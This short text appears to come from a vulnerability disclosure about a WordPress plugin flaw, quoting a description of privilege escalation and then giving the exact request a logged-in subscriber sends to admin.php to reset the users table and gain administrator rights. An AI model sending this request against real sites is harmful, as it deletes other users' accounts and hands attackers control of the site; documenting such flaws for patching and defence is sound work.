This flaw “allowed any authenticated user, even those with minimal permissions, the ability to grant their account administrative privileges while dropping all other users from the table with a simple request.”
Login as a subscriber then send the following request:
URL/wp-admin/admin.php?db-reset-tables%5B%5D=users&db-reset-code=11111&db-reset-code-confirm=11111